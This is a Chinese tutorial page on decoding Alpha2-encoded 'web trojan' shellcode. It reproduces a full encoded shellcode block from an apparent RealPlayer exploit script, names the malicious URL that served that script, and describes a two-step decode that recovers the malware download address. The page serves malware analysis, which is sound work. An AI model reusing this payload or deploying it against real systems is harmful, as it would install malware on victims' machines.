当前位置:首页 >> 建筑/土木 >>

网马解密中级篇(Alpha2篇)


网马解密中级篇(Alpha2篇).txt恨一个人和爱一个人的区别是:一个放在嘴边,一个藏在心里。人生三愿:一是吃得下饭,二是睡得着觉,三是笑得出来。网马解密大讲堂——网马解密中级篇(Alpha2篇)
作者: networkedition

Alpha2是Realplay漏洞多采用此加密方式,该加密方式特征:

代码开

头:TYIIIIIIIIIIIIIIII;

一般情况下在网马解密过程中,在获取的恶意网址源代码中,代码开头有上述类似代码,使用得加密方式即为alpha2。

下面我们将结合实例讲解alpha2解密方法,我们先来看一个典型的alpha2加密的网马代码:
复制内容到剪贴板代码:

var arr1=["c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\chimes.wav","c:\\Program Files\\NetMeeting\\testSnd.wav","C:\\WINDOWS\\system32\\BuzzingBee.wav","C:\\WINDOWS\\clock.avi","c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\tada.wav","C:\\WINDOWS\\system32\\LoopyMusic.wav"];
ShellCode="";
ShellCode=ShellCode+"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI";
ShellCode=ShellCode+"xkR0qJPJP3YY0fNYwLEQk0p47zpf"+"KRKJJKVe9xJKYoIoYolOoCQv";
ShellCode=ShellCode+"3VsVwLuRKwRva"+"vbFQvJMWVsZzMFv0z8K8mwVPnxmmn8mDUBzJMEB";
ShellCode=ShellCode+"sHuN3ULUhmfxW6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGO";
ShellCode=ShellCode+"NuKpTRr"+"NWOVYM5m"+"qqrwSMTn"+"oeoty08JM"+"nKJMgPw2p"+"ey5MgMWQuMw";
ShellCode=ShellCode+"runOgp8mpn8m7PrZBEleoWng2DRELgZMU6REoUJMmLHmz1KUOPCX";
ShellCode=ShellCode+"HmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQK";
ShellCode=ShellCode+"e6pfQvXeMpPuVPwP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI";
ShellCode=ShellCode+"5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQ";
ShellCode=ShellCode+"OjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWL";
ShellCode=ShellCode+"gOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5";
ShellCode=ShellCode+"PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcEN";
ShellCode=ShellCode+"eStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw";
ShellCode=ShellCode+"2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwW";
ShellCode=ShellCode+"qvRHptd4RPFZVOdoSXQqrORXQy0a6QP86NPcbOpmTo1hsYu14oPfFUTnU3PspsOpgp"; 我们将上述代码,复制粘贴至freshow的上操作区域,相见下列截图:



http://www.baidu163sinasohu.cn/sina/real.js这个恶意网址源代码内容为上述代码,由于恶意网址的时效性,这个恶意网址已经失效,我将此js脚本源代码已保存,直接使用源代码来讲解,并不影响我们的讲解。

接下来我们要将此代码处理一下,去掉没有用的部分。相见下列截图:



大的红色框里内容为处理后源代码,实际就是将shellcode部分保留,删除其余无效代码内容。

接下来我们选择解密选项为alpha2,点击decode进行一次解密,解密后内容会显示在下操作区域,点击up按钮将下操作区域代码上翻至上操作区域,进行二次解密,解密选项选择esc,点击decode进行二次解密,获得网马下载地址,请见下列截图:

相关文章:
各种网马de解密
网马解密参考手册 37页 8财富值 网马解密参考手册 35页 1财富值 手工解密网马 13页 8财富值 网马解密初级篇 2页 免费 网马解密中级篇(Alpha2篇) 1页 免...
网马解密(偏于方法)
Snapshot%20Viewer%20Control.1%22%29%3B%7D%0D%0Acatch%28n%29%7B%7D%...网马解密中级篇(Alpha2篇... 1页 免费 网马解密参考手册 37页 2下载券 PKPM...
网马解密初级篇
根据恶意网址名称来判断漏洞 2.根据 CLSID 判断漏洞: 常见网马解密工具: 1....网马解密中级篇(Alpha2篇... 2页 免费 网马解密中级篇(Alpha2篇... 1页...
中高级指导师培训评审表(2012.2)马春丽
中高级指导师培训评审表(2012.2)马春丽_企业管理_经管营销_专业资料。家庭教育...谢谢中华家庭教育网的团队老师们给予我们无私的帮助 和指导! 考试科目 得分 评估...
更多相关标签:
热海搜查官 解密篇 | 七艺之殇解密篇 | 我杀了他解密篇 | 祝大彤太极解密十三篇 | 加密解密篇视频课程 | 语法填空解密 基础篇 | 生化危机6艾达篇解密 | 聂道大学堂中级篇专辑 |